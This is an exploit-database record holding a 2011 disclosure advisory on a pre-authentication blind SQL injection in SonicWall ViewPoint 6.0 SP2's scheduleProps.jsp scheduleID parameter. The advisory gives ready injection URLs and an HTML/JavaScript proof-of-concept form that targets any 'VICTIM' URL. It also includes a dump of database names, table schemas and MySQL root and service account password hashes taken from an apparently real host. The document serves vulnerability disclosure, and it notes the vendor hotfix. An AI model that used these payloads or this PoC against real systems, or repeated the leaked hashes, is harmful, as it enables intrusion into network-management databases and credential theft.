{"type": "packetstorm", "published": "2011-10-02T00:00:00", "reporter": "vulnerability-lab.com", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "178c41aa1dfbe156f25216beddceb575"}, {"key": "modified", "hash": "dcce8600db9c5ad53a9da68bc894196f"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "dcce8600db9c5ad53a9da68bc894196f"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "bbdd876d05f5c0de4ab1505c73c52b9b"}, {"key": "sourceData", "hash": "818aa0c14ab33aa9efd927d9267f59a4"}, {"key": "sourceHref", "hash": "dc0ae4725931557874c65bd84722ee28"}, {"key": "title", "hash": "9acfdc3778227ee21611749a591cc4af"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`Title: \n====== \nSonicWall Viewpoint v6.0 SP2 - Blind SQL Injection Vulnerability \n \n \nDate: \n===== \n2011-10-02 \n \n \nReferences: \n=========== \nhttp://www.vulnerability-lab.com/get_content.php?id=196 \n \n \nVL-ID: \n===== \n196 \n \n \nIntroduction: \n============= \nSonicWALL\u00ae ViewPoint\u2122 ist ein benutzerfreundliches webbasiertes Reporting-Tool, das die Sicherheitsprodukte und -dienste \nvon SonicWALL vollst\u00e4ndig unterst\u00fctzt und erweitert. Es kann flexibel als Software oder virtuelle Appliance implementiert \nwerden. Umfassende Reporting-Funktionen geben Administratoren einen unmittelbaren Einblick in den Zustand, die Leistung und \ndie Sicherheit ihres Netzwerks. Mithilfe der anpassbaren \u00dcbersichtsanzeige und einer Vielzahl von Verlaufsberichten unterst\u00fctzt \nSonicWALL ViewPoint Unternehmen aller Gr\u00f6\u00dfen dabei, Netzwerknutzung und Sicherheitsaktivit\u00e4ten zu \u00fcberwachen und die \nWebnutzung anzuzeigen. \n \n(Copy of the Vendor Homepage: http://www.sonicwall.com/de/Centralized_Management_and_Reporting.html) \n \n \nAbstract: \n========= \nVulnerability-Lab Team discovered a remote exploitable blind sql injection vulnerability on Sonicwalls Viewpoint v6.0 SP2. \n \n \nReport-Timeline: \n================ \n2011-06-16: Vendor Notification \n2011-09-21: Vendor Response/Feedback \n2011-10-01: Vendor Fix/Patch \n2011-10-02: Public or Non-Public Disclosure \n \n \nStatus: \n======== \nPublished \n \n \nAffected Products: \n================== \nSonicWall \nProduct: ViewPoint Application v6.0 SP2 \n \n \nExploitation-Technique: \n======================= \nRemote \n \n \nSeverity: \n========= \nCritical \n \n \nDetails: \n======== \nA remote sql injection vulnerability is detected on the famous Sonicwall Viewpoint Application v6.x. \nThe vulnerability allows an attacker to inject/execute (pre-auth) own sql statements. The successfully \nexploitation of the vulnerability can lead to unauthorized database access. \n \n \nVulnerable Modules(SQL): \n \n[+] Schedule Reports (pre auth) \n \nPictures: \n \n../sql1.png \n../sql2.png \n \nExample URL: \nhttps://gms.xxx.com/sgms/reports/scheduledreports/configure/scheduleProps.jsp?scheduleID= \n \n \n \n--- SQL Log --- \n \nselect @@version = 5.0.83-enterprise-nt \nselect user() = vpuser@localhost \nselect @@datadir = C:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\GMSVP\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\MySQL\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\data\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \nSELECT count(schema_name) FROM information_schema.schemata = 43 \nSELECT schema_name FROM information_schema.schemata limit 0,1 = information_schema \nSELECT schema_name FROM information_schema.schemata limit 1,1 = mysql \nSELECT schema_name FROM information_schema.schemata limit 2,1 = rawsyslogdb_20090905 \nSELECT schema_name FROM information_schema.schemata limit 3,1 = rawsyslogdb_20090906 \nSELECT schema_name FROM information_schema.schemata limit 4,1 = rawsyslogdb_20090907 \nSELECT schema_name FROM information_schema.schemata limit 10,1 = rawsyslogdb_20100223 \nSELECT schema_name FROM information_schema.schemata limit 20,1 = rawsyslogdb_20100305 \nSELECT schema_name FROM information_schema.schemata limit 30,1 = rawsyslogdb_20100315 \nSELECT schema_name FROM information_schema.schemata limit 37,1 = rawsyslogdb_20100322 \nSELECT schema_name FROM information_schema.schemata limit 39,1 = rawsyslogdb_20100324 \nSELECT schema_name FROM information_schema.schemata limit 40,1 = sgmsdb \nSELECT schema_name FROM information_schema.schemata limit 41,1 = sgmsdb_archive \nSELECT schema_name FROM information_schema.schemata limit 42,1 = test \n \n+----------------------+ \n| Databases | \n+----------------------+ \n| mysql | \n| rawsyslogdb_20090905 | \n| rawsyslogdb_20090906 | \n| rawsyslogdb_20090907 | \n| rawsyslogdb_20090926 | \n| rawsyslogdb_20090927 | \n| rawsyslogdb_20090928 | \n| rawsyslogdb_20090929 | \n| rawsyslogdb_20090930 | \n| rawsyslogdb_20100225 | \n| rawsyslogdb_20100226 | \n| rawsyslogdb_20100227 | \n| rawsyslogdb_20100228 | \n| rawsyslogdb_20100301 | \n| rawsyslogdb_20100302 | \n| rawsyslogdb_20100303 | \n| rawsyslogdb_20100304 | \n| rawsyslogdb_20100305 | \n| rawsyslogdb_20100306 | \n| rawsyslogdb_20100307 | \n| rawsyslogdb_20100308 | \n| rawsyslogdb_20100309 | \n| rawsyslogdb_20100310 | \n| rawsyslogdb_20100311 | \n| rawsyslogdb_20100312 | \n| rawsyslogdb_20100313 | \n| rawsyslogdb_20100314 | \n| rawsyslogdb_20100315 | \n| rawsyslogdb_20100316 | \n| rawsyslogdb_20100317 | \n| rawsyslogdb_20100318 | \n| rawsyslogdb_20100319 | \n| rawsyslogdb_20100320 | \n| rawsyslogdb_20100321 | \n| rawsyslogdb_20100322 | \n| rawsyslogdb_20100323 | \n| rawsyslogdb_20100324 | \n| rawsyslogdb_20100325 | \n| rawsyslogdb_20100326 | \n| sgmsdb | \n| sgmsdb_archive | \n| test | \n+----------------------+ \n \n \n \nSELECT concat(host,0x3a,user,0x3a,password) FROM mysql.user limit 0,1 = localhost:root:*50F99C5E85A49EF12C936A17C978C626B9D2BA98 \nSELECT concat(host,0x3a,user,0x3a,password) FROM mysql.user limit 1,1 = 127.0.0.1:root: \nSELECT concat(host,0x3a,user,0x3a,password) FROM mysql.user limit 2,1 = %:root:*50F99C5E85A49EF12C936A17C978C626B9D2BA98 \nSELECT concat(host,0x3a,user,0x3a,password) FROM mysql.user limit 3,1 = localhost:vpuser:*51297F75C4E5B009F5D973BA8E94831BC1A9A2E0 \nSELECT concat(host,0x3a,user,0x3a,password) FROM mysql.user limit 4,1 = %:vpuser:*51297F75C4E5B009F5D973BA8E94831BC1A9A2E0 \n \n \n \n \nDatabase: sgmsdb \n[324 tables] \n+--------------------------------+ \n| ac_categories | \n| ac_desc | \n| ac_enum | \n| ac_models | \n| ac_nodes | \n| activation_codes | \n| alert_ui_details | \n| alert_ui_screens | \n| alertcontents | \n| alertdstschedmappings | \n| alerts | \n| alerttypes | \n| appliances | \n| archive_tables | \n| as_categories | \n| aspyware_signatures | \n| auth_servers | \n| bkp_reporting_dependent_tables | \n| central_gateway | \n| csm_categories | \n| csm_default_appfilter_ports | \n| csm_signatures | \n| dao_archive_tables | \n| dash_page | \n| dash_page_comp | \n| default_rss_feeds | \n| diag_snapshots | \n| domains | \n| ec_rule_args | \n| ec_rule_argvals | \n| ec_rule_groups | \n| ec_rule_stmts | \n| ec_rules | \n| firmware_versions | \n| firmwareimagetbl | \n| fw_dea_unit_data | \n| fw_dea_unit_keys | \n| fwdyndata | \n| gav_signatures | \n| gmsvpinstances | \n| hm_appliance_config | \n| hm_httpclient_config | \n| hm_record | \n| hm_recording | \n| hm_service_config | \n| hm_template | \n| impl_info | \n| ips_categories | \n| log_custom_settings_tbl | \n| logs | \n| logs_msg_autosuggest | \n| mgmt_dea_services | \n| mgmt_dea_xfrs | \n| mgmt_feature | \n| mgmt_fw_filter | \n| mgmt_fw_filter_data | \n| mgmt_fw_filter_perms | \n| mgmt_inh_dep_screens_view | \n| mgmt_misc_scrn_params | \n| mon_emailalertschedule | \n| mon_tunnel_status | \n| monactions | \n| moncategories | \n| mondevices | \n| monitors | \n| monpings | \n| monseverity | \n| monsnmpacquiredata | \n| monsnmpdata | \n| monsnmpinfo | \n| monsnmpmibinfo | \n| monsnmprealtimemonitorelements | \n| monsnmprealtimemonitors | \n| monsnmprtmtemplateelements | \n| monsnmprtmtemplates | \n| monthresholdelements | \n| monthresholds | \n| non_allowed_devices | \n| olh_groupname | \n| params | \n| params1 | \n| params2 | \n| params3 | \n| params_group_info | \n| params_info | \n| perf_db_backup | \n| perf_summarizer_thread | \n| perf_syslog_collector | \n| perf_syslog_files | \n| perf_viewpoint_summarizer | \n| pkiadmin | \n| pkiusercert | \n| rc_cert | \n| rc_sa | \n| rc_snmp | \n| rc_syslog | \n| report_module_perf_metrics | \n| schedulegroups | \n| scheduleripc | \n| schedulers | \n| schedules | \n| schedulesmapping | \n| screens | \n| scrn_perms | \n| settings | \n| severities | \n| sgms_config | \n| sgms_sessions | \n| sgms_views | \n| signature_status | \n| signatureimagetbl | \n| signatures | \n| sonicpoint_country_tbl | \n| sonicpoint_domain_tbl | \n| static_devices | \n| sub_policy | \n| summarizer_modules | \n| summarizers | \n| sw_0017c51036b8 | \n| sw_addr_groups | \n| sw_addr_objects | \n| sw_allowed_urls | \n| sw_as_product_settings | \n| sw_as_signature_settings | \n| sw_aspywareexcludelist | \n| sw_av_ext | \n| sw_av_ips | \n| sw_cert_blacklist | \n| sw_cert_whitelist | \n| sw_certs | \n| sw_cfacategories | \n| sw_cfacustomcategories | \n| sw_cfaexcluderanges | \n| sw_cfafiletypes | \n| sw_cfakeywords | \n| sw_cfapolicies | \n| sw_cfaurls | \n| sw_cfs_enterprise | \n| sw_cfsexcluderanges | \n| sw_consent_ip_addresses | \n| sw_csm_appfilter_ports | \n| sw_ddns | \n| sw_dhcp_dynamic_ranges | \n| sw_dhcp_grp_members | \n| sw_dhcp_opt_grps | \n| sw_dhcp_options | \n| sw_dhcp_static_ranges | \n| sw_dmz | \n| sw_forbidden_urls | \n| sw_fw_access_rules | \n| sw_gavexcluderanges | \n| sw_grp_schedules | \n| sw_guest_profiles | \n| sw_ha_full_monitoring | \n| sw_ha_monitoring | \n| sw_idpexcluderanges | \n| sw_ids_aps | \n| sw_ind_alert_data | \n| sw_ind_history | \n| sw_ind_hm_params | \n| sw_ind_ipssiglist | \n| sw_ind_migration1 | \n| sw_ind_migration2 | \n| sw_ind_params4 | \n| sw_ind_svportalsettings | \n| sw_info | \n| sw_interfaces | \n| sw_intranet | \n| sw_ip_helper_apps | \n| sw_iphelper | \n| sw_ips_categories | \n| sw_knownservices | \n| sw_knownservices_info | \n| sw_lans | \n| sw_lic_nodes | \n| sw_local_groups | \n| sw_local_users | \n| sw_local_usr_grp_obj_relation | \n| sw_meta_cfs_categories | \n| sw_monitor_objects | \n| sw_nat_objects | \n| sw_ntp_servers | \n| sw_one_to_one_nat | \n| sw_profiles | \n| sw_qos_mapping | \n| sw_rbl_domains | \n| sw_rip | \n| sw_route_objects | \n| sw_routes | \n| sw_rules | \n| sw_sas | \n| sw_schedules | \n| sw_service_groups | \n| sw_service_objects | \n| sw_services | \n| sw_signatures | \n| sw_sonicpoints | \n| sw_sonicpoints_n | \n| sw_sso_auth_agents | \n| sw_static_arp | \n| sw_switch_ports | \n| sw_syslog_server | \n| sw_trusted_urls | \n| sw_ulahttpurls | \n| sw_url_keywords | \n| sw_user_group_trees | \n| sw_user_trees | \n| sw_useraddressranges | \n| sw_users | \n| sw_userservices | \n| sw_vap | \n| sw_vap_groups | \n| sw_vpnaddressranges | \n| sw_vpnservices | \n| sw_wepclient | \n| sw_wgs_ipdeny | \n| sw_wgs_keywords | \n| sw_wgs_profiles | \n| sw_wifiservices | \n| sw_wirelessguest | \n| sw_wirelessmac | \n| sw_zones | \n| tasks | \n| thresholdelements | \n| thresholds | \n| translation_tbl | \n| trapmgrs | \n| unit_level_app_settings | \n| unit_perms | \n| unituptimestats | \n| used_accodes | \n| userpasswords | \n| users | \n| users_motd | \n| version | \n| vp_alert_data | \n| vp_appl_dts | \n| vp_appl_summarizer_settings | \n| vp_by_category_summary | \n| vp_by_policy_summary | \n| vp_by_site_detail | \n| vp_by_site_summary | \n| vp_categories | \n| vp_connection_details | \n| vp_connection_events | \n| vp_cstm_configs | \n| vp_cstm_fields | \n| vp_cstm_rules | \n| vp_cstm_templates | \n| vp_cstm_templates_fields | \n| vp_cstm_templates_rules | \n| vp_dest_hosts | \n| vp_dn_dest_library | \n| vp_dn_src_library | \n| vp_email_details | \n| vp_email_logos | \n| vp_email_profiles | \n| vp_email_receivers | \n| vp_email_screens | \n| vp_email_summary | \n| vp_firewall_reports | \n| vp_firewall_totals | \n| vp_firewalls | \n| vp_host_summary | \n| vp_hosts_for_auto_suggest | \n| vp_hourly_summary | \n| vp_login_summary | \n| vp_report_dates | \n| vp_reports | \n| vp_service_details | \n| vp_service_summary | \n| vp_service_type | \n| vp_services | \n| vp_site_detail | \n| vp_src_hosts | \n| vp_top_detail | \n| vp_top_report_summary | \n| vp_top_summary | \n| vp_total_types | \n| vp_unit_summarizer_settings | \n| vp_users | \n| vp_websites_filter | \n| vp_webusers_filter | \n| vpappfw_connection_policies | \n| vpappfw_daily_totals | \n| vpappfw_events | \n| vpappfw_hourly_totals | \n| vpappfw_policies | \n| vpcdp_agent_daily_status | \n| vpcdp_agents | \n| vpcdp_appl_daily_status | \n| vpcdp_appl_dts | \n| vpcdp_appliances | \n| vpcdp_daily_details | \n| vpcdp_daily_summary | \n| vpcdp_filetypes | \n| vpcdp_hourly_summary | \n| vpecm_agent_service | \n| vpecm_agents | \n| vpecm_appl_dts | \n| vpecm_daily_totals | \n| vpecm_hazards | \n| vpecm_service_types | \n| vpecm_summary | \n| vpecm_top_hazards | \n| vpssl_appl_dts | \n| vpssl_daily_performance | \n| vpssl_daily_totals | \n| vpssl_details | \n| vpssl_dst_hosts | \n| vpssl_events | \n| vpssl_hourly_performance | \n| vpssl_hourly_totals | \n| vpssl_login_events | \n| vpssl_login_types | \n| vpssl_resources | \n| vpssl_src_hosts | \n| vpssl_total_types | \n| vpssl_users | \n| wireless_country_list | \n| ws_configs | \n| ws_distributed_appliances | \n| ws_distributed_instances | \n| ws_services | \n+--------------------------------+ \n \nDatabase: sgmsdb \nTable: vp_users \n[5 columns] \n+----------------+--------------+ \n| Column | Type | \n+----------------+--------------+ \n| domain | varchar(250) | \n| id | bigint(20) | \n| last_updated | timestamp | \n| last_updatedby | varchar(35) | \n| name | varchar(250) | \n+----------------+--------------+ \n \n \nDatabase: sgmsdb \nTable: userpasswords \n[5 columns] \n+----------------+-------------+ \n| Column | Type | \n+----------------+-------------+ \n| domainID | varchar(32) | \n| ID | varchar(64) | \n| last_updated | timestamp | \n| LAST_UPDATEDBY | char(32) | \n| PASSWORD | varchar(64) | \n+----------------+-------------+ \n \nDatabase: sgmsdb \nTable: users \n[74 columns] \n+--------------------------------+--------------+ \n| Column | Type | \n+--------------------------------+--------------+ \n| active | varchar(2) | \n| activePage | varchar(32) | \n| activeTill | datetime | \n| APPSELSHOW | varchar(1) | \n| AUDIO | varchar(3) | \n| authServerID | varchar(32) | \n| autoDelete | varchar(2) | \n| COMMENTS | varchar(255) | \n| comments_enabled | smallint(5) | \n| controls | varchar(254) | \n| CREATION_DATE | timestamp | \n| dashboardBarAutoHideStatus | varchar(32) | \n| datePwdChanged | datetime | \n| DISABLED | smallint(5) | \n| DOCKINGVALUE | varchar(3) | \n| domainID | varchar(32) | \n| doNotShowSMTPParamsWarnilg | | \n| dst_interface | varchar(10) | \n| EMAIL1 | varchar(64) | \n| EMAIL2 | varchar(64) | \n| enable_session_popup | smallint(5) | \n| FAX | varchar(24) | \n| FNAME | varchar(32) | \n| hmRecordBarAutoHideStatus | smallint(1) | \n| ID | varchar(32) | \n| IDLE_TIMEOUT | smallint(5) | \n| issuperadmin | smallint(1) | \n| itemsPerPage | varchar(3) | \n| LAST_LOGIN | datetime | \n| last_updated | datetime | \n| last_updatedby | char(32) | \n| liveMonitorAutoScrollStatus | varchar(32) | \n| liveMonitorBarAutoHideStatus | varchar(32) | \n| liveMonitorRefreshInterval | varchar(32) | \n| LNAME | varchar(32) | \n| lockoutCounter | varchar(2) | \n| MNAME | varchar(32) | \n| monEnableAutoRefresh | varchar(4) | \n| monMinDashSeverity | varchar(32) | \n| monUIAutoRefreshInterval | varchar(16) | \n| monUIStatusSelection | varchar(64) | \n| monUITableColCount | varchar(24) | \n| monUITableColor | varchar(24) | \n| monUITableRowHeight | varchar(24) | \n| monViewType | varchar(4) | \n| MSGS_PER_SCREEN | smallint(5) | \n| needPwdChange | varchar(2) | \n| PAGER | varchar(24) | \n| PASSWORD | char(32) | \n| PHONE | varchar(24) | \n| REPORT_BIDIRECTIONAL | smallint(5) | \n| REPORT_END_HOUR | varchar(8) | \n| REPORT_NUM_ENTRIES_PER_ITEM | varchar(8) | \n| REPORT_NUM_ITEMS | varchar(8) | \n| REPORT_NUM_SITES | varchar(8) | \n| REPORT_NUM_USERS | varchar(8) | \n| REPORT_ROWS_PER_SCREEN | smallint(5) | \n| REPORT_SITES_BY_USERS | varchar(8) | \n| REPORT_SITES_LIST | varchar(256) | \n| REPORT_START_HOUR | varchar(8) | \n| REPORT_USERS_LIST | varchar(256) | \n| REPORT_USERS_WHOLE_NAMEIP_SRCH | smallint(5) | \n| REPORT_VIEW_TYPE | smallint(5) | \n| SCHEDS_PER_SCREEN | smallint(5) | \n| scheduleid | varchar(32) | \n| screenDefaultChartTypes | varchar(50) | \n| smtpParamWarningLastShowTime | datetime | \n| src_interface | varchar(10) | \n| STOCK | smallint(5) | \n| TASKS_PER_SCREEN | smallint(5) | \n| USER_TYPE_ID | varchar(32) | \n| usertypeType | varchar(2) | \n| VIEW_ID | varchar(32) | \n| vp_controls | varchar(254) | \n+--------------------------------+--------------+ \n \n \nNote: The file is not just located on viewpoint ;) \n \n \n \nProof of Concept: \n================= \nThe sql vulnerability can be exploited by remote attackers(pre-auth). For demonstration or reproduce ... \n \n \nServer: http://viewpoint.demo.sonicwall.com \nPath: /sgms/reports/scheduledreports/configure/ \nFile: scheduleProps.jsp \nParam: ?scheduleID= \n \n \n<html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\"> \n<title>SonicWall => [scheduleProps.jsp] Remote SQL-Injection [PoC]</title><script language=\"JavaScript\"> \nvar path=\"/sgms/reports/scheduledreports/configure/\" \nvar adr=\"scheduleProps.jsp\" \nvar para =\"?scheduleID=\" \nvar sql = \"INCLUDE STATEMENT HERE like ... SELECT schema_name FROM information_schema.schemata limit 1,1 = mysql\" \nfunction hexhex(){ \nif (document.drops.hack.value==\"\"){ \nalert(\"FAILED! ERROR!\"); \nreturn false; \n} \ndrops.action= document.drops.hack.value+path+adr+para+sql; \ndrops.submit(); \n} \n//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- \n// SonicWall => [scheduleProps.jsp] Remote SQL-Injection [PoC] \n//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- \n// Vulnerability-Laboratory Research Team \n//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- \n</script></head><body bgcolor=\"#000000\" link=\"#990000\"> \n<center><p align=\"center\"><b><font face=\"Verdana\" size=\"2\" color=\"#006633\">SonicWall => [scheduleProps.jsp] - Remote SQL-Injection [PoC]</font> \n</b></p><form method=\"post\" hack=\"getting\" name=\"drops\" onSubmit=\"hexhex();\"><div align=\"left\"><p><b><font face=\"Arial\" size=\"2\" color=\"#006633\"> \nVICTIM:</font></b><input type=\"text\" name=\"hack\" size=\"53\" style=\"background-color: #006633\" onMouseOver=\"javascript:this.style.background='#808080';\" \nonMouseOut=\"javascript:this.style.background='#808000';\"></p><p><b><font face=\"Arial\" size=\"2\" color=\"#006633\">EXAMPLE:</font> \n<font face=\"Arial\" size=\"2\" color=\"#808080\"> HTTP://WWW.EXAMPLE-SERVER.DE/</font></b></p></div><p align=\"left\"> \n<input type=\"submit\" value=\"EXECUTE ON URL\" name=\"B1\"></p><p align=\"left\"><input type=\"reset\" value=\"CLEAR ALL\" name=\"B2\"></p></form><p><br> \n<iframe name=\"getting\" height=\"500\" width=\"1000\" scrolling=\"yes\" frameborder=\"0\"></iframe></p><div align=\"left\"> \n<p align=\"center\"><b><font face=\"Verdana\" size=\"2\" color=\"#008000\"><a href=\"mailto:x01445@gmail.com\">~rem0ve</a> | \n<a href=\"mailto:rem0ve@vulnerability-lab.com\" target=\"rem0ve@vulnerability-lab.com\">~x4lt</a> \n</font></b></p></div></center></body></html> \n \n \nReferences(SQL): \nhttp://viewpoint.xxx.com/sgms/reports/scheduledreports/configure/scheduleProps.jsp?scheduleID=3%20order%20by%201,%20%28 \nselect%20case%20when%20%281=1%29%20%20then%201%20else%201*%28select%20table_name%20from%20information_schema.tables%29end%29=1; \nhttp://viewpoint.xxx.com/sgms/reports/scheduledreports/configure/scheduleProps.jsp?scheduleID=3 order by type \nhttp://viewpoint.xxx.com/sgms/reports/scheduledreports/configure/scheduleProps.jsp?scheduleID=3 order by message \nhttps://gms.xxx.com/sgms/reports/scheduledreports/configure/scheduleProps.jsp?scheduleID='g0d-hac \n \n \nSolution: \n========= \nThe hotfix is available today(2011-10-01) to customers for download from our registration site (www.mysonicwall.com) \n \nHOTFIX ID: 104767 \n \n \nRisk: \n===== \nThe security risk of the sql injection vulnerability is estimated as critical because of the pre-auth remote attack technique. \n \n \nCredits: \n======== \nVulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) & Pim J.F. Campers (X4lt) \n \n \nDisclaimer: \n=========== \nThe information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, \neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- \nLab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business \nprofits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some \nstates do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation \nmay not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- \nLab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of \nother media, are reserved by Vulnerability-Lab or its suppliers. \n \nCopyright \u00a9 2011|Vulnerability-Lab \n \n \n-- \nWebsite: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com \nContact: admin@vulnerability-lab.com or support@vulnerability-lab.com \nPhone: 01776757259 \n \n`\n", "viewCount": 1, "history": [], "lastseen": "2016-11-03T10:29:43", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/105493/SonicWall-Viewpoint-6.0-SP2-Blind-SQL-Injection.html", "sourceHref": "https://packetstormsecurity.com/files/download/105493/VL-196.txt", "title": "SonicWall Viewpoint 6.0 SP2 Blind SQL Injection", "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2016-11-03T10:29:43"}, "dependencies": {"references": [], "modified": "2016-11-03T10:29:43"}, "vulnersScore": 0.5}, "references": [], "id": "PACKETSTORM:105493", "hash": "a42b2b1dcdc1b455c84561983d03e304c0df82c678ecdcc59ce776cbccad0cde", "edition": 1, "cvelist": [], "modified": "2011-10-02T00:00:00", "description": ""}

{}